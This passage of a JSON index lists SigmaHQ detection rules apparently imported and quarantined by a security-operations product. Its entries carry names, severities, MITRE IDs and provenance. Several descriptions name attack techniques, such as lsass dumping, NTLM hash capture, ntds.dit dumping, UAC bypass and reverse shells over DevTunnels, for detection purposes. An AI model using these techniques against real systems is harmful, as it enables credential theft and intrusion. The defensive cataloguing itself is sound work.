"quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmware_xfer.yml" } }, { "id": "sigmahq-sigma-93199800-b52a-4dec-b762-75212c196542", "type": "detection", "name": "PUA - RunXCmd Execution", "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-runxcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93199800-b52a-4dec-b762-75212c196542", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml" } }, { "id": "sigmahq-sigma-932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "type": "detection", "name": "Audio Capture via PowerShell", "description": "Detects audio capture via PowerShell Cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" } }, { "id": "sigmahq-sigma-93671f99-04eb-4ab4-a161-70d446a84003", "type": "detection", "name": "Capture Credentials with Rpcping.exe", "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capture-credentials-with-rpcping-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93671f99-04eb-4ab4-a161-70d446a84003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" } }, { "id": "sigmahq-sigma-9386d78a-7207-4048-9c9f-a93a7c2d1c05", "type": "detection", "name": "Code Execution via Pcwutl.dll", "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/code-execution-via-pcwutl-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" } }, { "id": "sigmahq-sigma-93a19907-d4f9-4deb-9f91-aac4692776a6", "type": "detection", "name": "UAC Bypass Using .NET Code Profiler on MMC", "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-net-code-profiler-on-mmc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93a19907-d4f9-4deb-9f91-aac4692776a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" } }, { "id": "sigmahq-sigma-93d298a1-d28f-47f1-a468-d971e7796679", "type": "detection", "name": "Disable Tamper Protection on Windows Defender", "description": "Detects disabling Windows Defender Tamper Protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-tamper-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93d298a1-d28f-47f1-a468-d971e7796679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" } }, { "id": "sigmahq-sigma-93d94efc-d7ad-4161-ad7d-1638c4f908d8", "type": "detection", "name": "HackTool - Dumpert Process Dumper Default File", "description": "Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dumpert-process-dumper-default-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_dumpert.yml" } }, { "id": "sigmahq-sigma-93e0ef48-37c8-49ed-a02c-038aab23628e", "type": "detection", "name": "Azure Container Registry Created or Deleted", "description": "Detects when a Container Registry is created or deleted.", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-container-registry-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93e0ef48-37c8-49ed-a02c-038aab23628e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-941e5c45-cda7-4864-8cea-bbb7458d194a", "type": "detection", "name": "Suspicious Remote Logon with Explicit Credentials", "description": "Detects suspicious processes logging on with explicit credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-remote-logon-with-explicit-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" } }, { "id": "sigmahq-sigma-944e8941-f6f6-4ee8-ac05-1c224e923c0e", "type": "detection", "name": "Add Port Monitor 
Persistence in Registry", "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-port-monitor-persistence-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" } }, { "id": "sigmahq-sigma-944f6adb-7a99-4c69-80c1-b712579e93e6", "type": "detection", "name": "Suspicious Browser Activity", "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-browser-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "944f6adb-7a99-4c69-80c1-b712579e93e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" } }, { "id": "sigmahq-sigma-9465ddf4-f9e4-4ebd-8d98-702df3a93239", "type": "detection", "name": "IIS Native-Code Module Command Line Installation", "description": "Detects suspicious IIS native-code module installations via command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-native-code-module-command-line-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml" } }, { "id": "sigmahq-sigma-94771a71-ba41-4b6e-a757-b531372eaab6", "type": "detection", "name": "File Download From Browser Process Via Inline URL", "description": "Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. 
This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-browser-process-via-inline-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94771a71-ba41-4b6e-a757-b531372eaab6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml" } }, { "id": "sigmahq-sigma-948a0953-f287-4806-bbcb-3b2e396df89f", "type": "detection", "name": "Unsigned Mfdetours.DLL Sideloading", "description": "Detects DLL sideloading of unsigned \"mfdetours.dll\". 
Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-mfdetours-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "948a0953-f287-4806-bbcb-3b2e396df89f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml" } }, { "id": "sigmahq-sigma-9494bff8-959f-4440-bbce-fb87a208d517", "type": "detection", "name": "Changes to Device Registration Policy", "description": "Monitor and alert for changes to the device registration policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changes-to-device-registration-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9494bff8-959f-4440-bbce-fb87a208d517", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml" } 
}, { "id": "sigmahq-sigma-949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "type": "detection", "name": "Explorer Process Tree Break", "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/explorer-process-tree-break.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" } }, { "id": "sigmahq-sigma-94a66f46-5b64-46ce-80b2-75dcbe627cc0", "type": "detection", "name": "Roles Activation Doesn't Require MFA", "description": "Identifies when a privileged role can be activated without performing MFA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-activation-doesn-t-require-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94a66f46-5b64-46ce-80b2-75dcbe627cc0", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml" } }, { "id": "sigmahq-sigma-94dc4390-6b7c-4784-8ffc-335334404650", "type": "detection", "name": "Dump Ntds.dit To Suspicious Location", "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dump-ntds-dit-to-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94dc4390-6b7c-4784-8ffc-335334404650", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml" } }, { "id": "sigmahq-sigma-9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "type": "detection", "name": "Network Connection Initiated To DevTunnels Domain", "description": "Detects network connections to Devtunnels domains initiated by a process on a system. 
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-devtunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_devtunnels.yml" } }, { "id": "sigmahq-sigma-95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "type": "detection", "name": "HackTool - RedMimicry Winnti Playbook Execution", "description": "Detects actions caused by the RedMimicry Winnti playbook, an automated breach-emulation utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1059.003", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-redmimicry-winnti-playbook-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml" } }, { "id": "sigmahq-sigma-951f8d29-f2f6-48a7-859f-0673ff105e6f", "type": "detection", "name": "CodeIntegrity - Unsigned Kernel Module Loaded", "description": "Detects the presence of a loaded unsigned kernel module on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unsigned-kernel-module-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "951f8d29-f2f6-48a7-859f-0673ff105e6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" } }, { "id": "sigmahq-sigma-9525dc73-0327-438c-8c04-13c0e037e9da", "type": "detection", "name": "Regsvr32 Execution From Potential Suspicious Location", "description": "Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-execution-from-potential-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9525dc73-0327-438c-8c04-13c0e037e9da", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml" } }, { "id": "sigmahq-sigma-952ed57c-8f99-453d-aee0-53a49c22f95d", "type": "detection", "name": "Potential AVKkid.DLL Sideloading", "description": "Detects potential DLL sideloading of \"AVKkid.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-avkkid-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "952ed57c-8f99-453d-aee0-53a49c22f95d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_avkkid.yml" } }, { "id": "sigmahq-sigma-95361ce5-c891-4b0a-87ca-e24607884a96", "type": "detection", "name": "Binary Padding - MacOS", "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This rule detects the use of dd and truncate to append junk data to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-padding-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95361ce5-c891-4b0a-87ca-e24607884a96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_binary_padding.yml" } }, { "id": "sigmahq-sigma-953945c5-22fe-4a92-9f8a-a9edc1e522da", "type": "detection", "name": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abuse-of-service-permissions-to-hide-services-via-set-service-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" } }, { "id": "sigmahq-sigma-953d460b-f810-420a-97a2-cfca4c98e602", "type": "detection", "name": "Source Code Enumeration Detection by Keyword", "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/source-code-enumeration-detection-by-keyword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "953d460b-f810-420a-97a2-cfca4c98e602", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_source_code_enumeration.yml" } }, { "id": 
"sigmahq-sigma-9541f321-7cba-4b43-80fc-fbd1fb922808", "type": "detection", "name": "Azure Kubernetes Cluster Created or Deleted", "description": "Detects when an Azure Kubernetes cluster is created or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-cluster-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9541f321-7cba-4b43-80fc-fbd1fb922808", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-954f0af7-62dd-418f-b3df-a84bc2c7a774", "type": "detection", "name": "New Remote Desktop Connection Initiated Via Mstsc.EXE", "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-remote-desktop-connection-initiated-via-mstsc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml" } }, { "id": "sigmahq-sigma-9577edbb-851f-4243-8c91-1d5b50c1a39b", "type": "detection", "name": "Atbroker Registry Change", "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/atbroker-registry-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" } }, { "id": 
"sigmahq-sigma-95afc12e-3cbb-40c3-9340-84a032e596a3", "type": "detection", "name": "Service Registry Permissions Weakness Check", "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-registry-permissions-weakness-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" } }, { "id": "sigmahq-sigma-95d61234-7f56-465c-6f2d-b562c6fedbc4", "type": "detection", "name": "Linux Package Uninstall", "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 